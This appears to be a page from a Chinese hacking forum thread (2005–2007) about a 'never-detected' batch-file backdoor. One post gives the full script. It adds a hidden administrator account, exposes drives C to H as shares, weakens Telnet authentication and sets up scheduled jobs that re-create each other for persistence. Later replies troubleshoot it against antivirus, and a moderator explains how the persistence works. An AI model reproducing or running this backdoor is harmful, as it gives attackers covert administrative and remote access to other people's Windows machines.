‹‹ 上一主题 | 下一主题 ››
 31 12
发新话题
打印

[转载]用批处理写的后门 永不被杀

kooking

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
39 
阅读权限
40 
在线时间
2 小时 
注册时间
2005-11-29 
最后登录
2005-11-29 
26楼 发表于 2005-11-29 15:30  只看该作者
以下是 localhost 上的设置

Alt 键已被映射到 'CTRL+A' :    YES
Idle 会话超时:  1 hours
最多连接次数:  2
Telnet 端口:   23
失败的登录企图的最多次数:     3
断开时结束任务:      YES
操作模式:     Console
身份验证机制:  NTLM, Password
默认域:      CHQP-53BBCDD878
状态:  Stopped


能不能给个菜鸟版的解释?

TOP

fycs

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
19 
阅读权限
40 
在线时间
11 小时 
注册时间
2005-11-3 
最后登录
2008-7-9 
27楼 发表于 2005-12-5 13:21  只看该作者
各位,,我在实际应用中有一个问题,,
 我测试的主机有
 
      麦咖啡的防火墙,好像不好用哟。。我又在里面加了,NET STOP 命令但同样无效。。。

    这段代码也就无用武之地了。。。

TOP

adly

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
30 
阅读权限
40 
在线时间
8 小时 
注册时间
2005-11-12 
最后登录
2007-10-7 
28楼 发表于 2005-12-5 19:49  只看该作者
就是不知道这个是什么服务:  
  @net stop schedule
  @net start Schedule
这个有什么作用啊?"log.bat"在xp系统中找不到啊!
  @echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
  @echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat

TOP

juezecn

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
16 
阅读权限
40 
在线时间
4 小时 
注册时间
2005-11-24 
最后登录
2006-2-5 
29楼 发表于 2005-12-10 20:57  只看该作者
@echo off
  @attrib +s + r xyt.bat
  @net user xyt hacker /add
  @net localgroup administrators xyt /add
  @net share c$=c:
  @net share d$=d:
  @net share e$=e:
  @net share f$=f:
  @net share g$=g:
  @net share h$=h:
  @tlntadmn config sec = -ntlm

  @net stop schedule
  @net start Schedule
  @echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
  @echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
  @at 11:05 c:\WINNT\SYSTEM32\xyt.bat
  @at 23:05 c:\WINNT\SYSTEM32\xyt.bat
'下面这两条命令可以改为从注册表里直接修改telnet服务的相应键值!
'这样可以解决ntml和telenet服务被禁止的问题
  @net stop telnet  
  @net start telnet
  @exit

TOP

losstangel

晶莹剔透§烈日灼然

Rank: 1

帖子
14 
精华
0 
积分
48 
阅读权限
40 
性别
男 
在线时间
10 小时 
注册时间
2005-12-3 
最后登录
2008-1-11 
30楼 发表于 2005-12-30 21:32  只看该作者
我想提出点问题
1.我运行tlntadmn config sec = -ntlm 系统回显必须有管理特权 我已经是管理员权限了
2.如果对方禁用telnet的话 你的net start telnet也是没用的!
3.我有点不明白 如果要bat文件去监视时间 是不是要把它做成一个服务?
   我只是个菜鸟 如果有什么地方提错了 请多原谅

TOP

fhod

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
901 
精华
16 
积分
6857 
阅读权限
150 
性别
男 
在线时间
532 小时 
注册时间
2004-12-6 
最后登录
2008-7-7 
31楼 发表于 2007-4-28 17:34  只看该作者
引用:
引用第33楼adly于2005-12-05 19:55发表的 :
就是不知这个是什么服务:
@net stop schedule
@net start Schedule
还有这两句是什么作用啊(在xp系统目录中找不到"log.bat"这个文件啊!):
@echo at 11:00 c:WINNTSYSTEM32log.bat > c:WINNTSYSTEM32xyt.bat
.......
我在
http://forum.eviloctal.com/read-htm-tid-28354.html
中有回复
把以上的批处理保存为log.bat运行后他自动生成
xyt.bat
其中
xyt.bat的内容为
at 11:00 c:\winnt\system32\log.bat
at 23:00 c:\winnt\system32\log.bat

@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat

这个意思是
把at 11:00 c:\WINNT\SYSTEM32\log.bat 写进c:\WINNT\SYSTEM32\xyt.bat 文件..如果没有就自动创建
第二个
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
同理..不过因为第一句已经创建了..所以第二个直接添加at 23:00 c:\WINNT\SYSTEM32\log.bat这里注意一定要是>>如果是>的话回直接覆盖那个xyt.bat文件

xyt.bat的作用是在特定的时间执行
log.bat的..其中log.bat执行后...又自动创建并覆盖xyt.bat
他两个就好比是在互相监视的
但如果log.bat被删除了话..这个批处理后门就没啥用了

如果你把这个批出来的文件名改为xyt.bat为不是log.bat运行后你会发现xyt.bat的内容由原来的换成了
at 11:00 c:\winnt\system32\log.bat
所以一定要把文件名改为log.bat这样才会成功

TOP

‹‹ 上一主题 | 下一主题 ››
 31 12
发新话题